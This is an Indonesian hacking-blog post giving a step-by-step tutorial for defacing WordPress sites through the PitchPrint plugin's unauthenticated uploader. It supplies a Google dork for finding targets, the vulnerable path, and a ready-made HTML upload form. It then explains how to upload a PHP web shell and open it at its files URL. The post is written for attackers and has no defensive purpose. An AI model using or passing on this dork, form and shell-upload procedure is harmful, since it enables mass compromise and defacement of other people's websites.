Hallo Gans skarang admin tamvan ini akan share tutor yg jos .
Dapatnya sih dari blog teman :D , dan saya coba exploitnya trnyata masih bnyak yg vuln mas .
Tanpa basa basi langsung aja pelajari tutornya di bwah ini .
Dork : "inurl:wp-content/plugins/pitchprint/" ( tanpa tanda kutip bos )
Exploit vulnerability : /wp-content/plugins/pitchprint/uploader/
CSRF :
<form method="POST" action="contoh.com/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Seperti biasa gunakan dorknya menggunakan search engine (google) :v
klau sudah dapat targetnya contoh
http://semvak.com/wp-content/plugins/pitchprint/
masukkin exploit vulnerability tadi yg ada di atas cok .
nanti tanda vulnnya kyak gini mas bro .
Klau sudah kyak gitu mas , sisa upload Shellnya broe , pake CSRF yang tadi ada diatas .
Klau gambarnya kek gitu berarti suksek .
jdi sisa panggil shellnya gampang kyak gini mas contohnya :
http://semvak.com/wp-content/plugins/pitchprint/uploader/files/namashellkau.php
Tarararararararararararararararararar :v , mudah kan bos?
Thanks To : www.sidoarjogetar.com - FrozenBear 404 - PhantomGhost - Sulawesi IT Sec
0 Comment to "Tutorial Deface WP PitchPrint Vulnerable"
Posting Komentar